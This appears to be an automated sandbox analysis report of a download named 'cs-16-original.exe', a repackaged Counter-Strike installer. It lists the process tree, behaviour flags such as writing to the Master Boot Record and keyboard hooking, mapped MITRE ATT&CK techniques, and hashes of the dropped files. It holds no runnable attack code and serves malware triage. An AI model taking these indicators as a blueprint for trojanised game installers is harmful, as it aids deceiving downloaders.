    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3292 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:7580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5768 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:7624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5548 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:2572
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6160 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:7880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6532 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:2360
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5288 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:2
    3⤵
    PID:8672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:5068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6516 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:9016
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2908 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:8988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=956 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:2284
- - C:\Users\Admin\Downloads\cs-16-original.exe
    "C:\Users\Admin\Downloads\cs-16-original.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:7948
  - - C:\Counter-Strike-Original\Counter-Strike.exe
      C:\Counter-Strike-Original\Counter-Strike.exe
      4⤵
      Executes dropped EXE
      PID:6292
    - - C:\Counter-Strike-Original\hl.exe
        
        "C:\Counter-Strike-Original\hl.exe" -game cstrike -appid 10 -steam
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:6900
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  PID:8072
- C:\Windows\System32\GamePanel.exe
  "C:\Windows\System32\GamePanel.exe" 00000000000901FE /startuptips
  2⤵
  PID:220
- C:\Windows\System32\GamePanel.exe
  "C:\Windows\System32\GamePanel.exe" 00000000000702D8 /startuptips
  2⤵
  - Checks SCSI registry key(s)
  PID:9048
- C:\Counter-Strike-Original\Counter-Strike.exe
  "C:\Counter-Strike-Original\Counter-Strike.exe"
  2⤵
  - Executes dropped EXE
  PID:7564
- - C:\Counter-Strike-Original\hl.exe
    "C:\Counter-Strike-Original\hl.exe" -game cstrike -appid 10 -steam
    3⤵
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Writes to the Master Boot Record (MBR)
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:4128

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4780

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4268

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3848

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3740

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4888

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:3812
- C:\Windows\system32\compattelrunner.exe
  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
  2⤵
  PID:7944
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5200

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:5044

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5620

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:7224

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5712

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6204

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:8384

C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
1⤵
- Drops desktop.ini file(s)
PID:7960

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3984

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:7796

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:2160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6276

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:6300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7384

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:7464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Counter-Strike-Original\00.dll

Filesize
40KB

MD5
e1cd35bbc28f73b7481e8835ee0f0b13

SHA1
ef40d489c61b178b54f8116548662ee876e0133f

SHA256
6ecef9ef0f62491d595b2f32c69b53c53a1b3a8a7c9dea39d56c6861f5b93bdf

SHA512
baf6f9063f95e6d699088ec4c0611825e030382ff913084feb7f913cc8f011d079b6c7143359391d8e30a5e26ac5a5358882b20e3ac31c5afdbe8867ff6f62a3

Download Submit
C:\Counter-Strike-Original\Counter-Strike.exe

Filesize
104KB

MD5
100091398ebb3083ff24d8caaad59879

SHA1
337b6cf369a990c9e8d41f6fafe0b7839656874d

SHA256
02711a0d6eb7b925ef6a05e0a042eab4c71321375e4b0962087b185a298d27ca

SHA512
b065eab501065691549120ee8bbe1013fb580930295456fc6df34e113af6c91a16bbfdb06b7c654cc90f85e87a9a5e474cdbbfa325b0751c7907c62154d4cac9

Download Submit
C:\Counter-Strike-Original\Uninstall.exe

Filesize
103KB

MD5
4b20fa40b6a5071fe92d3eae72b2b276

SHA1
17912b1705cae45a5b13bd9eb08330fd207c6f6e

SHA256
e09c567386c158618f951adae9ee32665dfb68941cddc214107ebf612b2b034f

SHA512
2e2f8ba826002f8463fc4dbf9f90384641ee820902c04c781a8c8227bb2a328cd72169dd6813fb7b70bb4990cc7660dd2ccb70d76db2e86cb5fd3b590cebb6c0

Download Submit
C:\Counter-Strike-Original\cstrike\custom.hp2

Filesize
475KB

MD5
8d50922140e43dce5f4d7d3f1d2ea97a

SHA1
78f66a1b914f90642ac0c70baa4cebae47c93e22

SHA256
0ec7e98f9f803ac6ba14b9650241ca36cc2bcdf2b2af40bebc2a62534fb0dadc

SHA512
5b7ae92ab148ef831b684a43ba19b7ade06c666f2696a05074eb46784c8f28863e0adb697c669ef6d44c120c77cd0fb2163291586a3b133ee9c4ebc7abac1d7b

Download Submit
C:\Counter-Strike-Original\cstrike\events\awp.sc

Filesize
9B

MD5
d14f11b47b92d829b6ec4912ca7349e8

SHA1
86b8dd77a055a3d1d154022492ed7d7e4ca371a5

SHA256
89a0f0c5f04ea6da99b4a48fb642b968d32350aa3e6697da24d2736b7bb195d0

SHA512
f19f860c86297921b972338dd0ee73241b3b822d1b9d977cee39e45891f1d57bf144cd676eb2e7e35985969613dff0896473dd8e89ad07c66e79ac94510fb5d7

Download Submit
C:\Counter-Strike-Original\cstrike\events\deagle.sc

Filesize
11B

MD5
e41aa21f57500b1b71802b76fcaaecd1

SHA1
554eaebf267f8aaceb4e9b18e28dfa5131168a09

SHA256
2092e6c9862b42fe817a552f0ecf05a58a2609b2424402404a796c325bdf2098

SHA512
4c2b2e183bb68c16b383532aa03d5dbaebebde35b843ff442b84f6c9dba655868e7e7ba76b5b92d003db1ac73ebdd2aed5933595b35d073c702b1e841d94269d

Download Submit
C:\Counter-Strike-Original\cstrike\game.ico

Filesize
7KB

MD5
4335bd4014d837b4c94896ce8833be2a

SHA1
f16b5951eed02e3c3516389031374e95268d9ce7

SHA256
13a9046a55d6059bbf1df982569ca56a6e6d48f70917103fb71256b41e473168

SHA512
38f1b35e0689e753c673464905dd3c9f23766cfbe6e76e1fc1a47633cfe614992e964c18fe30332b658c6e4d741e9da995b16e246ce0e1d7eb1e63d49abb121f

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\env\backalleydn.tga

Filesize
192KB

MD5
9fdd1b5a25c59e13091bfe30a869be19

SHA1
aa0ae6346f02d8691173cbc22326307bef7e33c5

SHA256
fbeea2b37b440aa44a8a000416067ec25c40f3382f858a6b2ae8625a98e8e4da

SHA512
a06018b75ad312a82171efb3275857cec0aa561cb39756a8c2e6286709e63112a64d060dd98448eafd86b86409bcbcb3955ed755510e3c73bb45f74a28516f0c

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\hegrenade.tga

Filesize
128KB

MD5
689ff54b631b2d6484360ebfeb4db40b

SHA1
b910825b0e4f68e2748035c185121d23548f4d7f

SHA256
3eafa5253f75d8d875e33735aa3593defd7158f589f79fd1db3f959637727391

SHA512
f168a1adb47de969a908fcb7ed6bce51659d62a58da5ccb6fd663f1ccdde66fd331d8a9420590f04e0f37c391adbb734d6f784885afc759f75a08db18285e906

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\icon_!.tga

Filesize
4KB

MD5
7700a513286051b56b17bed9a61db042

SHA1
b9e24c46b1b39faa3a507fcdf1dd9c737333fb9e

SHA256
bfbda01177026713aec34ce3f7a43fc08ed6a40cd749c304051128c04c0c5f43

SHA512
8daccd667b4c350b495d137878b33d73c14b6514833e412f7b6df0048a48adabe2e2c7cc1239819adf6aa194a2e4c88eefa0e40534a30c7d866da15964d833df

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\kevlar_helmet.tga

Filesize
128KB

MD5
31d80cdc3818eeafd3ca28d5fcd336ee

SHA1
4ef5b5f7ea3b5ff74978a247386111210e5e3f6c

SHA256
9965f2a662f293cdf978df9346b611c38cebb22e7612206516141d85b459b711

SHA512
37eb6ae89c5dfc4c2f1a2e5b8638544546ca8eb94742afc6b35f0a000605f6bceef860ae0a257ddbb2e9687cf12893b9979d279e7534e00970f4a9faf8b2264a

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\mp5.tga

Filesize
128KB

MD5
8f81a5c99134e03be3bbbaca938174d6

SHA1
23b12b6ec08950370967446e4b7c33f18de9fabf

SHA256
1c4eb081e6dee76aedf965d6e092f6d1b6ed16da2a6628d192baef9d8978eb2f

SHA512
0d3c9e63061d5ec2f15add9d938a11ce9f4e88ce24934f7951854703b06ead537e400919629d81c2f4ea38e37818c1fb76ceff8f191483d19f672fb2f9163928

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\p228.tga

Filesize
128KB

MD5
8aa5f3774c87e501403a7ee33c8bf5ac

SHA1
4b7ee9c96c0447348bd3742964ac8083ad70ab46

SHA256
a7d026358f15a6757675b2744a69ec195dac359cf3860fc7820e7ac9994e3e9d

SHA512
dae5bb75c1e72dc934c7785c20087237356cffa154d8a95f97a6960ecd0457fb1d0d2296035978900c35cb5fcc89ac62b570880a0078aae0e853b9dd89850e10

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\round_corner_ne.tga

Filesize
16KB

MD5
a04c4cace0b2d94fd57875b521f7a473

SHA1
dd08518a79d87e3f1581f33a44e5815d3e5d125a

SHA256
a8e1a53a89f3d4a4e92ee7b74de6470250d434732bde81bb6bfe6e6c7adae208

SHA512
79b29dbe1ea623a5bb3b872ab574ace993a4d4114c5507aa6e0b0b5d7a1175bbca3ae669a2d6ae8394e27b2ed55e1525c09cd8a27385735dc1267202f37be6a4

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\round_corner_nw.tga

Filesize
16KB

MD5
b0bcc99f81d4242dd3666de4112c21d2

SHA1
db1b075946fbec29c2af0d65f4e27662597936c2

SHA256
bc0265ef43a7bba66c05201e9bac17edb5c9be2102eb7d87684274175ba99501

SHA512
62354875ea64e70e0a3825b8a9b2258c417f77a34adba78fde22d5fa0a33256e7cb1e24b11454d6f20c41cf9df46eb06517cb70530799a4cdb93995f98beaf1f

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\round_corner_se.tga

Filesize
16KB

MD5
930d64812331dce6d2c86e8baeca2825

SHA1
fea51a3a14f94294d5eab4789a2a6a691b52ba5c

SHA256
000f42b1cedc1aa49d498bc9c44cffd47dbc21c0cd5c51292cd324a86a27b78a

SHA512
fa1e7484f2c0af72a8ff31685014905f9fe2ddeb8650aaacbf9ad676e147b2a6f182dd77788003b725fdd8ea57af689881168706694156a8cc8016daddc94528

Download Submit
C:\Counter-Strike-Original\cstrike\gfx\vgui\round_corner_sw.tga

Filesize
16KB

MD5
4fb5bd9729130ab2cfc069302bf501ee

SHA1
9d2141abf69619ed693f1f6c42f7ef46c692878c

SHA256
4f10fcb23fecc9b9ed0f46581aa0869ac757617ed513a593b7e0a98b4d7b145e

SHA512
ea5f4e158b8e41d7405ec0f3f07d38fc9558032ce4928d34e3880e7028024a922635f1c047c47eb6537e5b0942dc5b4c9607b23b2ff415d62df0707a401a3c58

Download Submit
C:\Counter-Strike-Original\cstrike\maps\de_aztec.txt

Filesize
107B

MD5
35f518a92df3d5007933c265060002b3

SHA1
65df999466ea99dad4e7c96c17ba35252fd9f4bf

SHA256
f133c7f6d53f034f75f09f7a996d648744261c2757d8fcf7d79cf599d2faa73d

SHA512
2dc1defd2ac939e09805d9c20feb1af0a34bb2e5c6a668be82d62566dd3cc8b9bdbcd8ea93cb3251bba76f355ed4820ce12bd49685ea09521bb587a38a072a68

Download Submit
C:\Counter-Strike-Original\cstrike\models\orange.mdl

Filesize
15KB

MD5
f14b062b101904f583e08c1566b54c62

SHA1
78861b98e5e81e9cbdfaa58346852b0beab92cc8

SHA256
a0d966a613a07719f3c16a16dc56e066e67a37f783004a6b98d0606a7d7b7c2e

SHA512
96845df3db85768eb7199102a6a883830b0a9df8ef7cfea5ff1de73b80ec3e93c21c39dfba687035df0785d66583c6a68aac07a53c99118bf25c406ac2964af7

Download Submit
C:\Counter-Strike-Original\cstrike\models\oranget.mdl

Filesize
150KB

MD5
d2f9bfbdfab24f89f6d2ddbb93adbc91

SHA1
282bacc14bff72671057a8ec708497e317c5144a

SHA256
1af4daafab2661cea253dd1c5f5cce5d7144d56cb76706820773c678cac8ee35

SHA512
2701e68cd88ba4ec28257be2c45cb6806376ab45bb6f2114ef3b46f7711edf1c380fdf640bc5aebf66df339d777b1408bf2f0c982f456a050abaa71b67d7ec27

Download Submit
C:\Counter-Strike-Original\cstrike\models\player.mdl

Filesize
2.2MB

MD5
52d571170973589af13778226ec1c2e4

SHA1
37ff26b8601b2983a67ff85634ed64dc5fa56cdb

SHA256
939d4c34cb8b7339afc286feddd45c5d88f103e3a9ae69066ab372da276f3b0e

SHA512
f84808140913810fd11de6005cdd6186152c17fbe65ad099cca6092b3c8ad3e4d56de590220c39a86f0e6f12a67a38da9cfe0c0de40cd28015ecf71feac0d749

Download Submit
C:\Counter-Strike-Original\cstrike\models\truck.mdl

Filesize
212KB

MD5
c83d00749a8de6252f562a64fb2b7972

SHA1
b73554a99f795b222328a6028e947bb9d2602b56

SHA256
5644bf4f0093c1f126950cf70a2fb8cef8103c72f369e99ac4d2c7bbff6801e2

SHA512
56a26be5a46990c9643e0afc6caa29e099f7f9297303c37c2211d1146e0c6a5b9b973a864bbb225d5c6938b6b78b7a3abdcddae8d025e34c9fc4e680788d6ce5

Download Submit
C:\Counter-Strike-Original\cstrike\models\w_kevlar.mdl

Filesize
20KB

MD5
0d0b376429b7d62707dff6dc60e95a98

SHA1
f41e8942a54ea395aabb81bffd9c99cada299852

SHA256
0efa0d78cf766e5c7dcdfeec4a442ea9b2051e921c130ccb2c52461971e0fe7e

SHA512
75b86c571826bcb3308e2be2e44a9227b7d8d758c447323904db6036450a1d38582736ec0a07aaa587105c10973b91e3c3bb937a93d4333aea00b8e21f5e8af3

Download Submit
C:\Counter-Strike-Original\cstrike\resource\game_menu_mouseover.tga

Filesize
25KB

MD5
b36770a623540b29126b7e59825baba7

SHA1
1d9687967f4ff66169ebeade7bd7f1a6d813e919

SHA256
2e89fd1e81a94d42fed066a19f7c86a81b4b5cf033f36dc9e5e475afc5a466d1

SHA512
d054597d5d8a32f22ac571320f6947b3f2bb47e15e695a9c0ffd771203f4a157d4c5feb389b38a8677947847f89abbd33b08f29e9dbbfd7699fb3230bb7d7533

Download Submit
C:\Counter-Strike-Original\cstrike\sound\misc\cow.wav

Filesize
22KB

MD5
04ba4ab857e2af4c66765cb111b155b1

SHA1
295d693ea8acd4c60f3d43178102f545df4eb0f3

SHA256
beb46165e47796d83cde58d8eab1e1c2ee98c3cbaf5c9a237023846252b9fe07

SHA512
4bb0a20dcc49428cb6c92924c52abd82043e4539b84c883c4e7ae543eb61490eb18d6e0cacde77c1bd3dce0ef1571f94d0dd44553822b9f59c6c87bbe85ac47e

Download Submit
C:\Counter-Strike-Original\cstrike\sound\misc\sheep.wav

Filesize
33KB

MD5
dece445cf19d136a6d63fd2257d76c2e

SHA1
96f673a1b7133e170feea7450f4c0a6c86bdddb4

SHA256
79da45b8af813e701e14c9468050716ea74b2344ceb69d8f9cdae4ec103f4e26

SHA512
5f336c3564db9f3bfdc567179bad847ce0957874874a876ae2276ed604db9e46a0ebe4f23765c492a84e797bc5fe869d53b9bfe9a8c9021149ccd8aac7155d01

Download Submit
C:\Counter-Strike-Original\cstrike\sound\plats\vehicle7.wav

Filesize
48KB

MD5
986c5239062f646cc3fb80ea0a21d4d0

SHA1
6ad28c7248b44ab456d6e60d6b9e067fda8e4ce7

SHA256
a97ae9246e33d39f63971a3efc2b0eca9fa4f8496cc1744dc2128f4906c9ddf6

SHA512
f5f5013bb9f398a3779f2af1bee3414c622aa544227667d1adcab2e6ef699ead0666dc3bb0c3c88812d973691c7edde8d0daa84ba19831a308e3fb29ee3def86

Download Submit
C:\Counter-Strike-Original\cstrike\sound\plats\vehicle_start1.wav

Filesize
32KB

MD5
31eba199827cbd827edaa33db0c4d2b6

SHA1
ab0d8e0f3ed37098c8f2416e7515b5c7009f2877

SHA256
a12b5ebd21782f35a0b72bf2a1819bb279ef80b41dc4c9db018134211b02fda0

SHA512
24aad7ffc3d039925c1b9ad6e3ba921a5f583a7ff85674e77ad80c2fda434f4b53f6e853a66dd79d9d4dd94ebcec3afac2318cff6f840ccabd6170619c6e7125

Download Submit
C:\Counter-Strike-Original\cstrike\sound\player\pl_pain5.wav

Filesize
6KB

MD5
c0fb3625cc1585cd433c32d7735093c0

SHA1
00bfc4a048b1040bb6bda52ec43e67d99097297a

SHA256
7d47f61514a0ae116b6fa8cd93563c52885624d0b7d71011e78f2177acb203ea

SHA512
da38a127fa81bd64080ddd8d3178778caa7d64e136ef83c03bfefebcd3278474ec5dddc3ba384394f392b0074593e808165d5373a4d0a365f9443382938dcda0

Download Submit
C:\Counter-Strike-Original\cstrike\sound\player\pl_pain6.wav

Filesize
7KB

MD5
c7f10685ff1747bdc02343681469d3c0

SHA1
2cd369c18bc47d6a1f710c19c7c3bdb44a373f31

SHA256
47355ecc7540834db51b7e5184a08ce7aeee6d2d2092d485e1f0742d678ace8b

SHA512
7dd78bfbe97909d045450aa0cdbc62cb5c5d8a2b763533a8c47910a3e7a7208337f21a4eed7fb6ccfade701245bf44a18a17249c06d08bba86eec196ccb7469b

Download Submit
C:\Counter-Strike-Original\cstrike\sound\player\pl_shot1.wav

Filesize
6KB

MD5
e5368c8411d0664461ae61c8d75ec269

SHA1
e23025a19b0ed3075b9297565e2db42a20e1cea2

SHA256
dbe1f165e3e986dfbe97551c98a761c133040c26f020f54ccebcbef99e4516b1

SHA512
9fd4fc40566985fb21834303585ecf6fd1d56d1ca476af4f01f3ce68a6678c02690ac9ff3e87143ef2c4f62fd2051e3418f4a8aa33a14283fac4ea0b6233657e

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\ak47-2.wav

Filesize
25KB

MD5
fadf055f1bcb523b01caab44a3ec3119

SHA1
9a08539cee6451e8b6eff265e529201e06ff680a

SHA256
76f1f571d72c1a0c30a682b7767db1d32a8282fd555498740cdadd1b7385c61e

SHA512
52c5cbca4f41472b36b109bf95ebc4693433902750482c919b44233d8488e10695e06cab0ea79a88eb6ae314fa6b879f70725cb4729cb39769a8fb456079f48b

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\c4_beep2.wav

Filesize
32KB

MD5
72608220f816dab6cbf84173d5afb54e

SHA1
931fecf4f25d742949e50d4abf427cceb58f00f9

SHA256
6a6d5a7b9eca859811e4917acb000a4a501c05611bd718f811a341f749fc63aa

SHA512
d99f2b228d368ce9454a70089de0cc790f1255bdba210794f4115d5f0d169a98d9fb9075dfe6a4a5e2efe4a75ac494f582e72454615735b2d85e96775229e899

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\de_deploy.wav

Filesize
10KB

MD5
